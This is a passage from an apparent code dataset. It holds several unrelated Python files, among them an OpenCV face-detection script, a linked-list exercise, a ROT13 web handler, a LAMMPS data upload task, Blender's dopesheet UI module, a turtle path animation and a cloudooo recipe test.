self.__template_image__\n\n","sub_path":"Template.py","file_name":"Template.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"261261821","text":"import cv2\n#openCV module\n\n\nface_cascade = cv2.CascadeClassifier('for_face.xml')\ncap = cv2.VideoCapture('v.mp4')\n# use 0 (inbuilt webcam) -1 (for external webcam) instead of v.mp4 to get results from webcam\n\n\nwhile True:\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n faces = face_cascade.detectMultiScale(gray, 1.9, 6)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 1)\n\n\n cv2.imshow('img', img)\n k = cv2.waitKey(2) & 0xff\n if k==27:\n break\n \ncap.release()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228289029","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n#Nodes and list WITH encapsulating class\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.size = 0\n\n def push_front(self, value):\n self.size += 1\n\n new_node = Node(value, self.head)\n self.head = new_node\n\n if self.tail == None:\n self.tail = self.head\n\n def push_back(self, value):\n self.size += 1\n\n if self.tail == None:\n self.push_front(value)\n else:\n self.tail.next = Node(value, None)\n self.tail = self.tail.next\n \n def pop_front(self):\n if self.head == None:\n return None\n\n self.size -= 1\n ret_val = 
self.head.data\n self.head = self.head.next\n \n if self.head == None:\n self.tail = self.head\n\n return ret_val\n \n def pop_back(self):\n current_node = self.head\n if self.tail == None:\n return None\n elif self.size == 1:\n self.tail = None\n self.head = self.tail\n else:\n while current_node.next != None:\n former_node = current_node\n current_node = current_node.next\n \n former_node.next = None\n\n self.size -= 1\n\n return current_node.data\n \n def get_size(self):\n return self.size\n \n def __str__(self):\n curr_node = self.head\n ret_str = \"\"\n\n while curr_node != None:\n ret_str += str(curr_node.data) + \" \"\n curr_node = curr_node.next\n \n return ret_str\n \nclass Stack:\n def __init__(self):\n self.container = LinkedList()\n\n def push(self, value):\n self.container.push_back(value)\n\n def pop(self):\n self.container.pop_back()\n\nclass Queue:\n def __init__(self):\n self.container = LinkedList()\n\n def add(self, value):\n self.container.push_back(value)\n\n def remove(self):\n self.container.pop_front()\n\nlis = LinkedList()\n\nlis.push_front(3)\nlis.push_front(2)\nlis.push_front(1)\n\nprint(lis)\n\nlis.push_back(4)\nlis.push_back(5)\n\nprint(lis)\n\nlis.pop_front()\nlis.pop_front()\nlis.pop_front()\n\nprint(lis)\n\nprint(lis.pop_back())\n\nprint(lis)\n\n\"\"\"\ndef print_list(head_element):\n while head_element != None:\n print(head_element.data, end=\" \")\n head_element = head_element.next\n print(\"\")\n\ndef push_front(head_element, value):\n #new_head = Node(value, head_element)\n #head_element = new_head\n\n new_head = Node()\n new_head.data = value\n new_head.next = head_element\n\n return new_head\n\ndef remove_front(head_element):\n if head_element == None:\n print(\"Cant remove from empty list!\")\n pass\n else:\n new_head = head_element.next\n head_element = None\n\n return new_head\n\ndef push_back(head_element, value):\n if head_element == None:\n head_element = value\n else: \n while head_element.next != None:\n head_element = head_element.next\n \n head_element.next = value\n\n\nhead = None\nprint_list(head)\n\nhead = push_front(head, 0)\nhead = push_front(head, 1)\nhead = push_front(head, 2)\nhead = push_front(head, 3)\n\nprint_list(head)\n\nhead = remove_front(head)\n\nprint_list(head)\n\npush_back(head, 6)\n\nprint_list(head)\n\"\"\"\n\n\n\n","sub_path":"nodes_and_linkedlists.py","file_name":"nodes_and_linkedlists.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244437895","text":"# Copyright 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webapp2\nimport cgi\n\nform=\"\"\"\n\n\n \n Unit 2 ROT13\n \n\n \n
    \n    Enter some text to ROT13:    \n    \n \n    \n \n
    \n \n\n\n\"\"\"\n\n#handler for /rot13\nclass ROT13(webapp2.RequestHandler):\n def write_form(self, user_input=\"\"):\n encoded_output = user_input.encode('rot13')\n self.response.out.write(form % {'encoded_output': cgi.escape(encoded_output, quote=True) })\n\n def get(self):\n self.write_form()\n\n def post(self):\n user_input = self.request.get(\"text\")\n self.write_form(user_input)\n","sub_path":"unit2/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536222250","text":"from invoke import task\nfrom os.path import exists, join\nimport requests\n\nfrom tasks.lammps.env import (\n LAMMPS_DIR,\n LAMMPS_FAASM_DATA_PREFIX,\n get_faasm_benchmark,\n)\nfrom tasks.util.faasm import get_faasm_upload_host_port\n\n\n@task(default=True, iterable=[\"bench\"])\ndef upload(ctx, bench):\n \"\"\"\n Upload LAMMPS benchmark data to Faasm\n \"\"\"\n for b in bench:\n _bench = get_faasm_benchmark(b)\n\n host, port = get_faasm_upload_host_port()\n url = \"http://{}:{}/file\".format(host, port)\n\n # Upload all data corresponding to the benchmark\n for data in _bench[\"data\"]:\n file_name = data.split(\"/\")[-1]\n host_path = join(LAMMPS_DIR, data + \".faasm\")\n faasm_path = join(LAMMPS_FAASM_DATA_PREFIX, file_name)\n\n if not exists(host_path):\n print(\"Did not find data at {}\".format(host_path))\n raise RuntimeError(\"Did not find LAMMPS data!\")\n\n print(\n \"Uploading LAMMPS data ({}) to {} ({})\".format(\n host_path, url, faasm_path\n )\n )\n response = requests.put(\n url,\n data=open(host_path, \"rb\"),\n headers={\"FilePath\": faasm_path},\n )\n\n print(\n \"Response {}: {}\".format(response.status_code, response.text)\n )\n\n if response.status_code != 200:\n raise RuntimeError(\"Error uploading LAMMPS data!\")\n","sub_path":"tasks/lammps/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"334960945","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Header,\n Menu,\n Panel,\n)\n\n#######################################\n# DopeSheet Filtering - Header Buttons\n\n# used for DopeSheet, NLA, and Graph Editors\n\n\ndef dopesheet_filter(layout, context, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n row = layout.row(align=True)\n row.prop(dopesheet, \"show_only_selected\", text=\"\")\n row.prop(dopesheet, \"show_hidden\", text=\"\")\n\n if is_nla:\n row.prop(dopesheet, \"show_missing_nla\", text=\"\")\n else: # graph and dopesheet editors - F-Curves and drivers only\n row.prop(dopesheet, \"show_only_errors\", text=\"\")\n\n if not generic_filters_only:\n if bpy.data.collections:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_collection\", text=\"\")\n\n if not is_nla:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n#######################################\n# Dopesheet Filtering Popovers\n\n# Generic Layout - Used as base for filtering popovers used in all animation editors\n# Used for DopeSheet, NLA, and Graph Editors\n\n\nclass DopesheetFilterPopoverBase:\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n # Generic = Affects all datatypes\n # XXX: Perhaps we want these to stay in the header instead, for easy/fast access\n @classmethod\n def draw_generic_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.prop(dopesheet, \"show_only_selected\", icon='NONE')\n col.prop(dopesheet, \"show_hidden\", icon='NONE')\n\n if is_nla:\n col.prop(dopesheet, \"show_missing_nla\", icon='NONE')\n else: # graph and dopesheet editors - F-Curves and drivers only\n col.prop(dopesheet, \"show_only_errors\", icon='NONE')\n\n # Name/Membership Filters\n # XXX: Perhaps these should just stay in the headers (exclusively)?\n @classmethod\n def draw_search_filters(cls, context, layout, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.label(text=\"With Name:\")\n if not is_nla:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n if (not generic_filters_only) and (bpy.data.collections):\n col = layout.column(align=True)\n col.label(text=\"In Collection:\")\n col.prop(dopesheet, \"filter_collection\", text=\"\")\n\n # Standard = Present in all panels\n @classmethod\n def draw_standard_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n\n # datablock filters\n layout.label(text=\"Filter by Type:\")\n flow = layout.grid_flow(row_major=True, columns=2, even_rows=False, align=False)\n\n flow.prop(dopesheet, \"show_scenes\", text=\"Scenes\")\n flow.prop(dopesheet, \"show_nodes\", text=\"Node Trees\")\n\n # object types\n if bpy.data.armatures:\n flow.prop(dopesheet, \"show_armatures\", text=\"Armatures\")\n if bpy.data.cameras:\n 
flow.prop(dopesheet, \"show_cameras\", text=\"Cameras\")\n if bpy.data.grease_pencil:\n flow.prop(dopesheet, \"show_gpencil\", text=\"Grease Pencil Objects\")\n if bpy.data.lights:\n flow.prop(dopesheet, \"show_lights\", text=\"Lights\")\n if bpy.data.meshes:\n flow.prop(dopesheet, \"show_meshes\", text=\"Meshes\")\n if bpy.data.curves:\n flow.prop(dopesheet, \"show_curves\", text=\"Curves\")\n if bpy.data.lattices:\n flow.prop(dopesheet, \"show_lattices\", text=\"Lattices\")\n if bpy.data.metaballs:\n flow.prop(dopesheet, \"show_metaballs\", text=\"Metaballs\")\n\n # data types\n flow.prop(dopesheet, \"show_worlds\", text=\"Worlds\")\n if bpy.data.particles:\n flow.prop(dopesheet, \"show_particles\", text=\"Particles\")\n if bpy.data.linestyles:\n flow.prop(dopesheet, \"show_linestyles\", text=\"Line Styles\")\n if bpy.data.speakers:\n flow.prop(dopesheet, \"show_speakers\", text=\"Speakers\")\n if bpy.data.materials:\n flow.prop(dopesheet, \"show_materials\", text=\"Materials\")\n if bpy.data.textures:\n flow.prop(dopesheet, \"show_textures\", text=\"Textures\")\n if bpy.data.shape_keys:\n flow.prop(dopesheet, \"show_shapekeys\", text=\"Shape Keys\")\n if bpy.data.cache_files:\n flow.prop(dopesheet, \"show_cache_files\", text=\"Cache Files\")\n\n layout.separator()\n\n # Object Data Filters\n\n # TODO: Add per-channel/axis convenience toggles?\n split = layout.split()\n\n col = split.column()\n col.prop(dopesheet, \"show_transforms\", text=\"Transforms\")\n\n col = split.column()\n col.prop(dopesheet, \"show_modifiers\", text=\"Modifiers\")\n\n layout.separator()\n\n # performance-related options (users will mostly have these enabled)\n col = layout.column(align=True)\n col.label(text=\"Options:\")\n col.prop(dopesheet, \"use_datablock_sort\", icon='NONE')\n\n\n# Popover for Dopesheet Editor(s) - Dopesheet, Action, Shapekey, GPencil, Mask, etc.\nclass DOPESHEET_PT_filters(DopesheetFilterPopoverBase, Panel):\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n def draw(self, context):\n layout = self.layout\n\n dopesheet = context.space_data.dopesheet\n ds_mode = context.space_data.mode\n\n layout.prop(dopesheet, \"show_summary\", text=\"Summary\")\n\n DopesheetFilterPopoverBase.draw_generic_filters(context, layout)\n\n if ds_mode in {'DOPESHEET', 'ACTION', 'GPENCIL'}:\n layout.separator()\n generic_filters_only = ds_mode != 'DOPESHEET'\n DopesheetFilterPopoverBase.draw_search_filters(context, layout,\n generic_filters_only=generic_filters_only)\n\n if ds_mode == 'DOPESHEET':\n layout.separator()\n DopesheetFilterPopoverBase.draw_standard_filters(context, layout)\n\n\n#######################################\n# DopeSheet Editor - General/Standard UI\n\nclass DOPESHEET_HT_header(Header):\n bl_space_type = 'DOPESHEET_EDITOR'\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n row = layout.row(align=True)\n row.template_header()\n\n if st.mode == 'TIMELINE':\n from .space_time import (\n TIME_MT_editor_menus,\n TIME_HT_editor_buttons,\n )\n TIME_MT_editor_menus.draw_collapsible(context, layout)\n TIME_HT_editor_buttons.draw_header(context, layout)\n else:\n layout.prop(st, \"ui_mode\", text=\"\")\n\n DOPESHEET_MT_editor_menus.draw_collapsible(context, layout)\n DOPESHEET_HT_editor_buttons.draw_header(context, layout)\n\n\n# Header for \"normal\" dopesheet editor modes (e.g. 
Dope Sheet, Action, Shape Keys, etc.)\nclass DOPESHEET_HT_editor_buttons(Header):\n bl_idname = \"DOPESHEET_HT_editor_buttons\"\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_label = \"\"\n\n def draw(self, context):\n pass\n\n @staticmethod\n def draw_header(context, layout):\n st = context.space_data\n tool_settings = context.tool_settings\n\n if st.mode in {'ACTION', 'SHAPEKEY'}:\n # TODO: These buttons need some tidying up -\n # Probably by using a popover, and bypassing the template_id() here\n row = layout.row(align=True)\n row.operator(\"action.layer_prev\", text=\"\", icon='TRIA_DOWN')\n row.operator(\"action.layer_next\", text=\"\", icon='TRIA_UP')\n\n row = layout.row(align=True)\n row.operator(\"action.push_down\", text=\"Push Down\", icon='NLA_PUSHDOWN')\n row.operator(\"action.stash\", text=\"Stash\", icon='FREEZE')\n\n layout.separator_spacer()\n\n layout.template_ID(st, \"action\", new=\"action.new\", unlink=\"action.unlink\")\n\n layout.separator_spacer()\n\n if st.mode == 'DOPESHEET':\n dopesheet_filter(layout, context)\n elif st.mode == 'ACTION':\n # 'generic_filters_only' limits the options to only the relevant 'generic' subset of\n # filters which will work here and are useful (especially for character animation)\n dopesheet_filter(layout, context, generic_filters_only=True)\n elif st.mode == 'GPENCIL':\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_gpencil_3d_only\", text=\"Active Only\")\n\n if st.dopesheet.show_gpencil_3d_only:\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_only_selected\", text=\"\")\n row.prop(st.dopesheet, \"show_hidden\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"filter_text\", text=\"\")\n\n layout.popover(\n panel=\"DOPESHEET_PT_filters\",\n text=\"\",\n icon='FILTER',\n )\n\n # Grease Pencil mode doesn't need snapping, as it's frame-aligned only\n if st.mode != 'GPENCIL':\n layout.prop(st, \"auto_snap\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(tool_settings, \"use_proportional_action\", text=\"\", icon_only=True)\n sub = row.row(align=True)\n sub.active = tool_settings.use_proportional_action\n sub.prop(tool_settings, \"proportional_edit_falloff\", text=\"\", icon_only=True)\n\n\nclass DOPESHEET_MT_editor_menus(Menu):\n bl_idname = \"DOPESHEET_MT_editor_menus\"\n bl_label = \"\"\n\n def draw(self, context):\n layout = self.layout\n st = context.space_data\n\n layout.menu(\"DOPESHEET_MT_view\")\n layout.menu(\"DOPESHEET_MT_select\")\n layout.menu(\"DOPESHEET_MT_marker\")\n\n if st.mode == 'DOPESHEET' or (st.mode == 'ACTION' and st.action is not None):\n layout.menu(\"DOPESHEET_MT_channel\")\n elif st.mode == 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_gpencil_channel\")\n\n if st.mode != 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_key\")\n else:\n layout.menu(\"DOPESHEET_MT_gpencil_frame\")\n\n\nclass DOPESHEET_MT_view(Menu):\n bl_label = \"View\"\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n layout.operator(\"action.properties\", icon='MENU_PANEL')\n layout.separator()\n\n layout.prop(st.dopesheet, \"use_multi_word_filter\", text=\"Multi-word Match Search\")\n\n layout.separator()\n\n layout.prop(st, \"use_realtime_update\")\n layout.prop(st, \"show_frame_indicator\")\n layout.prop(st, \"show_sliders\")\n layout.prop(st, \"show_group_colors\")\n layout.prop(st, \"show_interpolation\")\n layout.prop(st, \"show_extremes\")\n layout.prop(st, \"use_auto_merge_keyframes\")\n\n layout.prop(st, \"show_seconds\")\n layout.prop(st, 
\"show_locked_time\")\n\n layout.separator()\n layout.operator(\"anim.previewrange_set\")\n layout.operator(\"anim.previewrange_clear\")\n layout.operator(\"action.previewrange_set\")\n\n layout.separator()\n layout.operator(\"action.view_all\")\n layout.operator(\"action.view_selected\")\n layout.operator(\"action.view_frame\")\n\n # Add this to show key-binding (reverse action in dope-sheet).\n layout.separator()\n props = layout.operator(\"wm.context_set_enum\", text=\"Toggle Graph Editor\", icon=\"GRAPH\")\n props.data_path = \"area.type\"\n props.value = 'GRAPH_EDITOR'\n\n layout.separator()\n layout.menu(\"INFO_MT_area\")\n\n\nclass DOPESHEET_MT_select(Menu):\n bl_label = \"Select\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.select_all\", text=\"All\").action = 'SELECT'\n layout.operator(\"action.select_all\", text=\"None\").action = 'DESELECT'\n layout.operator(\"action.select_all\", text=\"Invert\").action = 'INVERT'\n\n layout.separator()\n layout.operator(\"action.select_box\").axis_range = False\n layout.operator(\"action.select_box\", text=\"Border Axis Range\").axis_range = True\n\n layout.operator(\"action.select_circle\")\n\n layout.separator()\n layout.operator(\"action.select_column\", text=\"Columns on Selected Keys\").mode = 'KEYS'\n layout.operator(\"action.select_column\", text=\"Column on Current Frame\").mode = 'CFRA'\n\n layout.operator(\"action.select_column\", text=\"Columns on Selected Markers\").mode = 'MARKERS_COLUMN'\n layout.operator(\"action.select_column\", text=\"Between Selected Markers\").mode = 'MARKERS_BETWEEN'\n\n layout.separator()\n props = layout.operator(\"action.select_leftright\", text=\"Before Current Frame\")\n props.extend = False\n props.mode = 'LEFT'\n props = layout.operator(\"action.select_leftright\", text=\"After Current Frame\")\n props.extend = False\n props.mode = 'RIGHT'\n\n # FIXME: grease pencil mode isn't supported for these yet, so skip for that mode only\n if context.space_data.mode != 'GPENCIL':\n layout.separator()\n layout.operator(\"action.select_more\")\n layout.operator(\"action.select_less\")\n\n layout.separator()\n layout.operator(\"action.select_linked\")\n\n\nclass DOPESHEET_MT_marker(Menu):\n bl_label = \"Marker\"\n\n def draw(self, context):\n layout = self.layout\n\n from .space_time import marker_menu_generic\n marker_menu_generic(layout)\n\n st = context.space_data\n\n if st.mode in {'ACTION', 'SHAPEKEY'} and st.action:\n layout.separator()\n layout.prop(st, \"show_pose_markers\")\n\n if st.show_pose_markers is False:\n layout.operator(\"action.markers_make_local\")\n\n layout.prop(st, \"use_marker_sync\")\n\n#######################################\n# Keyframe Editing\n\n\nclass DOPESHEET_MT_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_setting_toggle\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_enable\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_disable\", \"type\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n 
layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n layout.operator(\"anim.channels_fcurves_enable\")\n\n\nclass DOPESHEET_MT_key(Menu):\n bl_label = \"Key\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.keyframe_insert\")\n\n layout.separator()\n layout.operator(\"action.frame_jump\")\n\n layout.separator()\n layout.operator(\"action.copy\")\n layout.operator(\"action.paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator_menu_enum(\"action.keyframe_type\", \"type\", text=\"Keyframe Type\")\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n\n layout.separator()\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n layout.operator(\"action.sample\")\n\n\nclass DOPESHEET_MT_key_transform(Menu):\n bl_label = \"Transform\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"transform.transform\", text=\"Move\").mode = 'TIME_TRANSLATE'\n layout.operator(\"transform.transform\", text=\"Extend\").mode = 'TIME_EXTEND'\n layout.operator(\"transform.transform\", text=\"Slide\").mode = 'TIME_SLIDE'\n layout.operator(\"transform.transform\", text=\"Scale\").mode = 'TIME_SCALE'\n\n\n#######################################\n# Grease Pencil Editing\n\nclass DOPESHEET_MT_gpencil_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_setting_toggle\")\n layout.operator(\"anim.channels_setting_enable\")\n layout.operator(\"anim.channels_setting_disable\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n\n # XXX: to be enabled when these are ready for use!\n # layout.separator()\n # layout.operator(\"anim.channels_expand\")\n # layout.operator(\"anim.channels_collapse\")\n\n # layout.separator()\n #layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n\nclass DOPESHEET_MT_gpencil_frame(Menu):\n bl_label = \"Frame\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.duplicate\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator(\"action.keyframe_type\")\n\n # layout.separator()\n # layout.operator(\"action.copy\")\n # layout.operator(\"action.paste\")\n\n\nclass DOPESHEET_MT_delete(Menu):\n bl_label = \"Delete\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator(\"action.clean\").channels = False\n 
layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n\n\nclass DOPESHEET_MT_specials(Menu):\n bl_label = \"Dope Sheet Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.copy\", text=\"Copy\")\n layout.operator(\"action.paste\", text=\"Paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n layout.operator_menu_enum(\"action.easing_type\", \"type\", text=\"Easing Type\")\n\n layout.separator()\n\n layout.operator(\"action.keyframe_insert\").type = 'SEL'\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n\n\nclass DOPESHEET_MT_channel_specials(Menu):\n bl_label = \"Dope Sheet Channel Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"anim.channels_setting_enable\", text=\"Mute Channels\").type = 'MUTE'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unmute Channels\").type = 'MUTE'\n layout.separator()\n layout.operator(\"anim.channels_setting_enable\", text=\"Protect Channels\").type = 'PROTECT'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unprotect Channels\").type = 'PROTECT'\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n\n layout.operator(\"anim.channels_delete\")\n\n\nclass DOPESHEET_MT_snap_pie(Menu):\n bl_label = \"Snap\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n\n pie.operator(\"action.snap\", text=\"Current Frame\").type = 'CFRA'\n pie.operator(\"action.snap\", text=\"Nearest Frame\").type = 'NEAREST_FRAME'\n pie.operator(\"action.snap\", text=\"Nearest Second\").type = 'NEAREST_SECOND'\n pie.operator(\"action.snap\", text=\"Nearest Marker\").type = 'NEAREST_MARKER'\n\n\nclasses = (\n DOPESHEET_HT_header,\n DOPESHEET_HT_editor_buttons,\n DOPESHEET_MT_editor_menus,\n DOPESHEET_MT_view,\n DOPESHEET_MT_select,\n DOPESHEET_MT_marker,\n DOPESHEET_MT_channel,\n DOPESHEET_MT_key,\n DOPESHEET_MT_key_transform,\n DOPESHEET_MT_gpencil_channel,\n DOPESHEET_MT_gpencil_frame,\n DOPESHEET_MT_delete,\n DOPESHEET_MT_specials,\n DOPESHEET_MT_channel_specials,\n DOPESHEET_MT_snap_pie,\n DOPESHEET_PT_filters,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n","sub_path":"engine/2.80/scripts/startup/bl_ui/space_dopesheet.py","file_name":"space_dopesheet.py","file_ext":"py","file_size_in_byte":23059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"204244506","text":"from time import time\nfrom HamPath import *\nnodes=[[0, 0], [2, 2], [2, 0], [1, 2]]\nimport turtle\nimport 
math\nx,y=nodes[0],nodes[1]\nzoom=int(100/(math.sqrt((y[0]-x[0])**2+(y[1]-x[1])**2)))\nupdated=[[x[0]*zoom,x[1]*zoom] for x in nodes]\ndef anima(nodes,con):\n screen = turtle.getscreen()\n t = turtle.Turtle()\n t.speed(0)\n t.pu()\n for a in range(node_count):\n t.goto(updated[a])\n t.dot(10)\n t.write(f\"({nodes[a][0]}, {nodes[a][1]})\")\n for element in connections:\n t.pu()\n x,y=element[0],element[1]\n t.goto(updated[x])\n t.pd()\n t.goto(updated[y])\n t.color(\"green\")\n t.pensize(3)\n h = all_paths[0]\n t.pu()\n t.goto(updated[int(h[0])])\n t.pd()\n for x in range(1,node_count):\n t.goto(updated[int(h[x])])\nanima(nodes,connections)\nprint(\"Execution time for animations: \")\nprint(f\"{time()-end} seconds\")\n","sub_path":"Python/HamPath+Animasi.py","file_name":"HamPath+Animasi.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"145715049","text":"import os\nimport sys\nimport unittest\n\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom slapos.recipe import generic_cloudooo\n\nclass TestGenericCloudooo(unittest.TestCase):\n def new_recipe(self, options):\n buildout = {\n 'buildout': {\n 'bin-directory': '',\n 'find-links': '',\n 'allow-hosts': '',\n 'develop-eggs-directory': '',\n 'eggs-directory': '',\n 'python': 'testpython',\n },\n 'testpython': {\n 'executable': sys.executable,\n },\n 'slap-connection': {\n 'computer-id': '',\n 'partition-id': '',\n 'server-url': '',\n 'software-release-url': '',\n }\n }\n return generic_cloudooo.Recipe(buildout=buildout, name='generic_cloudooo', options=options)\n\n def setUp(self):\n self.test_dir = mkdtemp()\n def tearDown(self):\n if os.path.exists(self.test_dir):\n rmtree(self.test_dir)\n\n def test_install(self):\n # Basic check\n config_file_path = os.path.join(self.test_dir, \"test_install_configuration_file_etc_cloudooo-X.cfg\")\n recipe = self.new_recipe({\n \"ip\": \"test_install_ip\",\n \"environment\": \"test_install=environment\",\n \"mimetype_entry_addition\": \"text/install mimetype/entry addition\",\n \"ooo-binary-path\": \"test_install_ooo_binary_path\",\n \"ooo-paster\": \"test_install_ooo_paster\",\n \"ooo-uno-path\": \"test_ooo_uno_path\",\n \"port\": \"123\",\n \"openoffice-port\": 